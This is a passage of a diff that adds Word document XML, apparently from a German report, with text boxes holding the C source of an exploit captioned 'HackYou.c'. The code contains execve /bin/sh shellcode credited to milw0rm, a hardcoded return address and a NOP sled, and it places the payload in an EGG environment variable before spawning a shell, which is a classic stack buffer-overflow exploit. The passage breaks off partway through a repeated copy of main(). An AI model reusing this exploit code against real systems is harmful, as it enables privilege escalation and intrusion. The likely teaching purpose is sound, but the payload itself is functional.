+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>define</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> NOP 0x90</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 19" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:48.25pt;width:423pt;height:324.35pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdlib.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>string.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">// </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ripped</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>from</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> http://www.milw0rm.com/shellcode/444</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[]=</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x31\xc0"                      // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xorl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">     %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>,%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x50"                          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>pushl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">    %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>eax</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x68\x6e\x2f\x73\x68"          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>pushl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">    $0x68732f6e</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x68\x2f\x2f\x62\x69"          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>pushl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">    $0x69622f2f</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x89\xe3"                      // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">     %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>,%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x99"                          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>cltd</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x52"                          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>pushl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">    %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>edx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x53"                          // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>pushl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">    %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ebx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\x89\xe1"                      // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movl</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">     %</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>esp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>,%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ecx</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">"\xb0\x0b"                      // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>movb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">     $0xb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:t>,%</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:t>al</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>"\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xcd</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">\x80"                      // </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">      $0x80</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>retaddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\xf8\xd6\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>define</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> NOP 0x90</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Quellcode </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HackYou.c</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="18"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>115088</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5261101" cy="3313911"/>
+                <wp:effectExtent l="0" t="0" r="15875" b="20320"/>
+                <wp:wrapNone/>
+                <wp:docPr id="20" name="Textfeld 20"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5261101" cy="3313911"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>()</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[96];</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memset</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, NOP, 96);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, "EGG=", 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">(buffer+4, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 24);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">(buffer+88, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>retaddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(buffer+92, "\x00\x00\x00\x00", 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>putenv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>system</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>("/bin/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>sh</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>return</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 20" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:9.05pt;width:414.25pt;height:260.95pt;z-index:251672576;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>()</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[96];</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memset</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, NOP, 96);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
